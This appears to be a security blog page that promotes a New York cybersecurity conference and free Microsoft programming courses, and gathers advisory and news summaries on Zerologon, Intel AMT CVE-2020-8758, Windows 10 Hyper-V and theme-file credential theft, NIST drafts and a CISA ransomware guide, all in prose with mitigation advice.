New York Metro Joint Cyber-Security Conference

 I will be teaching at the New York Metro Joint Cyber-Security Conference (NYMJCSC.ORG).

This conference 2 day of security content that is being offered by the following Groups

Organizational Partners:

  • InfraGard Members Alliance – New York Metro Chapter
  • Information Systems Audit and Control Association (ISACA) – New Jersey Chapter
  • Information Systems Audit and Control Association (ISACA) – Greater Hartford CT Chapter
  • High Technology Crime Investigation Association (HTCIA) – New York City Metro Chapter
  • Internet Society (ISOC) – New York Chapter
  • Information Systems Security Association (ISSA) – New York Chapter

Community Partners:

  • (ISC)2 – New Jersey Chapter
  • Information Systems Audit and Control Association (ISACA) – New York Metro Chapter
  • Cloud Security Alliance (CSA) – New York Metro Chapter
  • Association of Certified Fraud Examiners (ACFE) – New Jersey Chapter
  • Association of Continuity Professionals (ACP) – New York City Metro Chapter
Please look at this link and i believe you find some great content at a very reasonable price.

The link is NYMJCSC.ORG

Latest Microsoft Security blog posts

 Title: Find your unscanned and overexposed shares on-premises with an
on-premises scanner

URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/find-your-unscanned-and-overexposed-shares-on-premises-with-an/ba-p/1744783
Overview: Microsoft Information Protection is a built-in, intelligent, unified,
and extensible solution to protect sensitive data across your enterprise – in
Microsoft 365 cloud services, on-premises, third-party SaaS applications, and
more. Microsoft Information Protection provides a unified set of capabilities
to know your data, protect your data, and prevent data loss across cloud services,
devices, and on-premises file shares.

 

Title: Microsoft Information Protection and Compliance Resources
URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/microsoft-information-protection-and-compliance-resources/ba-p/1184950
Overview: The Microsoft Information Protection and Compliance Customer
Experience (CXE) team work with Microsoft’s largest enterprise customers to
provide guidance and advisory services to help them deploy our information
protection and compliance solutions.

 

Title: Why integrated phishing-attack training is reshaping
cybersecurity—Microsoft Security
URL: https://www.microsoft.com/security/blog/2020/10/05/why-integrated-phishing-attack-training-is-reshaping-cybersecurity-microsoft-security/
Overview: Phishing is still one of the most significant risk vectors facing
enterprises today. Innovative email security technology like Microsoft Defender
for Office 365 stops a majority of phishing attacks before they hit user
inboxes, but no technology in the world can prevent 100 percent of phishing
attacks from hitting user inboxes. At that point in…

 

Title: Azure Sentinel To-Go (Part2): Integrating a Basic Windows Lab 🧪
via ARM Templates
🚀
URL: https://techcommunity.microsoft.com/t5/azure-sentinel/azure-sentinel-to-go-part2-integrating-a-basic-windows-lab-via/ba-p/1742165
Overview: Most of the time when we think about the basics of a detection
research lab, it is an environment with Windows endpoints, audit policies
configured, a log shipper, a server to centralize security event logs and an
interface to query, correlate and visualize the data collected.

 

Title: 3 ways Microsoft helps build cyber safety awareness for all
URL: https://www.microsoft.com/security/blog/2020/10/05/3-ways-microsoft-helps-build-cyber-safety-awareness-for-all/
Overview: Learn how Microsoft is helping secure your online life through user
education, cybersecurity workshops, and continued diversity in hiring.

 

Title: Migrating from Exchange Transport Rules to Unified DLP – The
complete playbook

URL: https://techcommunity.microsoft.com/t5/microsoft-security-and/migrating-from-exchange-transport-rules-to-unified-dlp-the/ba-p/1749723
Overview: This document provides an overview of how enterprise customers can
migrate their existing Exchange Transport Rules to Unified DLP portal. It walks
through the different stages of migration and shows the effectiveness of the
unified DLP portal as a single place to define all aspects of your DLP
strategy.
In summary, this play book will help to
Understand the
migration process.
Understand the
unified console and interface.
Develop a
strategy for the migration.
Ensure a smooth
migration process.
Find resources
to support the migration process. 

 

Python for Beginners a free resource from Microsoft

 Probably the largest hurdle when learning any new programming language is simply knowing where to get started. This is why we, Chris and Susan, decided to create this series about Python for Beginners!


Even though we won’t cover everything there is to know about Python in the course, we want to make sure we give you the foundation on programming in Python, starting from common everyday code and scenarios. At the end of the course, you’ll be able to go and learn on your own, for example with docs, tutorials, or books.

This is all on youtube.com
Go to this LINK

Beginner’s Series to: JavaScript a free resource from Microsoft

 Learning a new framework or development environment is made even more difficult when you don’t know the programming language. Fortunately, we’re here to help! We’ve created this series of videos to focus on the core concepts of JavaScript.


While we don’t cover every aspect of JavaScript, we will help you build a foundation from which you can continue to grow. By the end of this series, you’ll be able to work through tutorials, quick starts, books, and other resources, continuing to grow on your own.

The video series is designed to be consumed as you see fit. You can watch from start to finish, or you can dive into specific topics. You can always bookmark and come back as you need.

This is a YouTube videos 51 different video to help you to learn JavaScript

Go to this link

CVE-2020-1472 | Netlogon Elevation of Privilege Vulnerability

 An
elevation of privilege vulnerability exists when an attacker
establishes a vulnerable Netlogon secure channel connection to a domain
controller, using the Netlogon Remote Protocol (MS-NRPC).
An attacker who successfully exploited the vulnerability could run a
specially crafted application on a device on the network.

To exploit the vulnerability, an unauthenticated attacker would be
required to use MS-NRPC to connect to a domain controller to obtain
domain administrator access.

Microsoft is addressing the vulnerability in a phased two-part
rollout. These updates address the vulnerability by modifying how
Netlogon handles the usage of Netlogon secure channels.

For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020).

When the second phase of Windows updates
become available in Q1 2021, customers will be notified via a revision
to this security vulnerability. If you wish to be notified when these
updates are released, we recommend that you register for the security
notifications mailer to be alerted of content changes to this advisory.
See Microsoft Technical Security Notifications.

Blockchain Networks: Token Design and Management Overview – Draft NISTIR 8301 Available for Comment

Traditional
data and operations management across organizations and on the web can involve
inefficient transaction reconciliation between siloed databases, password
fatigue, and single points of failure. This often results in concerns over
interoperability, security, and privacy of data that affect both users and
businesses.

Blockchain
technology has enabled a new software paradigm for managing digital ownership
in partial or zero-trust environments. It uses tokens to conduct transactions,
exchange verifiable data, and achieve coordination across organizations and on
the web. Data models with varied capabilities and scopes have been defined to
issue tokens. By allowing for the design of programmable digital assets that
can represent different forms of ownership, these models enable users to store,
move, and even create value on top of shared or public digital infrastructures.

NIST
announces the release of Draft
NISTIR 8301, 
Blockchain
Networks: Token Design and Management Overview
which provides a
high-level technical overview and conceptual framework of token designs and
management methods. The document highlights the different types of tokens and
how they are held in custody. It then examines transaction management under
three fundamental aspects: validation, submission, and viewability.
Infrastructure tools used to develop applications that integrate blockchain
networks and second layer protocols are also reviewed. Finally, the paper
presents deployment scenarios and use cases for tokens before concluding with
potential breakthroughs in privacy-preserving verifiable data exchange. The
terminology, concepts, properties, and architectures introduced in this work
can facilitate understanding and communications among business owners, software
developers, cybersecurity professionals within an organization, and individuals
who are or will be using such systems.

A public comment period for this
document is open
through October 30, 2020
. See the publication
details
 for a copy of the document and instructions for
submitting comments.

NOTE:
A call for patent claims is included on page iv of this draft. For
additional information, see the Information
Technology Laboratory (ITL) Patent Policy–Inclusion of Patents in ITL
Publications
.

ITL
Patent Policy:
https://www.nist.gov/itl/information-technology-laboratory-itl-patent-policy-inclusion-patents-itl-publications

CISA and MS-ISAC Release Ransomware Guide

 

The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State
Information Sharing & Analysis Center (MS-ISAC)
have released a joint Ransomware
Guide
that details practices that organizations should continuously engage
in to help manage the risk posed by ransomware and other cyber threats. The
in-depth guide provides actionable best practices for ransomware prevention as
well as a ransomware response checklist that can serve as a ransomware-specific
addendum to organization cyber incident response plans.

CISA encourages users and administrators to review the Ransomware
Guide
and CISA’s Ransomware
webpage
for additional information.

Securing Home IoT Devices Using MUD: Final Public Draft of SP 1800-15 Now Available

 

NIST
CYBERSECURITY and PRIVACY PROGRAM

Securing Home
IoT Devices Using MUD: Final Public Draft of SP 1800-15 Now Available

NIST’s National Cybersecurity Center of Excellence (NCCoE)
has released the final public draft of the NIST Cybersecurity
Practice Guide, SP
1800-15,
Securing
Small-Business and Home Internet of Things (IoT) Devices: Mitigating
Network-Based Attacks Using Manufacturer Usage Description (MUD)
,
and is seeking the public’s comments on the contents. This practice
guide is intended to show IoT device developers and manufacturers,
network equipment developers and manufacturers, and service providers
who employ MUD-capable components how to integrate and use MUD and
other tools to satisfy IoT users’ security requirements.

The public comment period is open through October 16,
2020.
See the publication
details
for a copy of the draft and instructions for
submitting comments.

NOTE:  A call for patent claims is included on
page iii of 1800-15B. For additional information, see the Information
Technology Laboratory (ITL) Patent Policy–Inclusion of Patents in ITL
Publications
.

Publication details:
https://csrc.nist.gov/publications/detail/sp/1800-15/draft

ITL Patent Policy:
https://www.nist.gov/itl/information-technology-laboratory-itl-patent-policy-inclusion-patents-itl-publications


NIST Cybersecurity and Privacy Program
NIST Applied Cybersecurity Division (ACD)
National Cybersecurity Center of Excellence (NCCoE)
Questions/Comments regarding Draft SP 1800-15 – send email to
[email protected]
CSRC Website Questions? Send email to: [email protected] 

Intel vPro Gets vPwned

 Modern processors are extremely complicated devices and aren’t single purpose number crunching machines as they were in the past. A modern CPU contains subsystems responsible for power management, remote administration, hardware security, and much more. Intel brands this collection of technologies as vPro. The subsystem with perhaps the most attack surface is branded as Intel Active Management Technology (AMT), a system designed to allow for remote administration of corporate computer assets. It provides out of band administration, meaning an authorized administrator can perform any number of tasks on the machine without requiring specific operating system features like a functioning Windows install or separate software running on the system. This week researchers discovered a critical flaw in the AMT system allowing for an unauthorized user to completely takeover affected machines.

Intel AMT runs on a dedicated microprocessor embedded in the normal CPU and as such isn’t something a normal user ever has to deal with. It is able to piggyback on the normal networking stack exposed to the operating system to allow for out of band management of the machine without any user interaction. Due to it being embedded in the processor it has almost complete and unrestricted access to the system. This makes finding flaws in it extremely valuable to researchers and hackers. Luckily the flaw found this week was discovered by internal Intel researchers whose goal it is to discover critical vulnerabilities before attackers do. CVE-2020-8758 was disclosed in a security advisory and ranks a 9.8/10 on the CVSS scale. The flaw is the result of improper buffer restrictions in the network component of the AMT subsystem and could allow for privilege escalation and complete takeover of a system running the vulnerable version. The critical flaw requires that AMT has been previously provisioned by a system administrator and that an attacker can reach the system over the network.

While the main vulnerability disclosed requires AMT to be provisioned, a second attack scenario was also disclosed which is able to attack an un-provisioned AMT instance. In this attack scenario an attacker would require local access to the machine to exploit the flaw. While not nearly as critical of a remote over-the-network exploit, it can pose a threat for systems exposed to public access such as shared computing resources or cases where a machine may be left unattended for an amount of time.

While no known attacks utilizing the flaw have been seen yet ,Intel recommends that systems running the affected firmware versions are patched immediately.

Sources:

· https://threatpost.com/critical-intel-active-management-technology-flaw-allows-privilege-escalation/159036/

· https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00404.html

 

Don’t Leave Your Windows Open (to Attack)

 No matter what operating system you use, there will be vulnerabilities lurking in the nooks and crannies we may never consider. If you’re using Windows 10, here are two you should know about.

The first bug affects all Windows 10 editions except for Home, as it leverages Hyper-V, a feature that provides hardware virtualization. In order to create and modify files in certain areas of Windows a user needs elevated privileges. This is to protect sensitive areas of the operating system. Enabling Hyper-V circumvents the need for admin credentials, as researcher Jonas Lykkegaard showed how he was able to drop an arbitrary file into the System32 folder and then modify it with user-level credentials.

Luckily, Hyper-V is disabled by default, so if you don’t use any sort of virtualization you won’t be vulnerable. However, if you enable the Windows Sandbox feature, which is often used for testing software, Hyper-V will automatically be enabled as well. The risk of this bug is low enough that the researcher decided not to submit it directly to Microsoft, so it is unclear if or when a patch will be released. The best advice here would be to keep your system up to date and to disable features that you aren’t using.

The next bug involves a feature on Windows 10 that most users have used – Themes. Whether it’s selecting a pre-packaged theme to get away from that default blue, or using our own wallpapers to customize, nearly everyone makes some sort of change to the appearance of their desktop. Some users go a step further and export their custom themes to share or import custom themes that others have built. This is where the vulnerability comes in. Researcher Jimmy Bayne recently showed that modified Windows 10 themes could be used in Pass-the-Hash attacks.

Bayne demonstrated how an attacker could create a theme file with a modified wallpaper setting that would request a remote resource requiring authentication. If user tries to install the theme, Windows will automatically attempt to access the remote resource using the credentials of the user that is currently logged into Windows. From there an attacker can harvest the credentials. Even worse, this attack will work with Microsoft account credentials, meaning attackers would be able to access users’ online resources as well. The easiest way to mitigate the threat is to enable two-factor authentication and avoid custom themes from third parties.

Sources

· https://www.bleepingcomputer.com/news/security/windows-10-sandbox-activation-enables-zero-day-vulnerability/

· https://www.bleepingcomputer.com/news/microsoft/windows-10-themes-can-be-abused-to-steal-windows-passwords/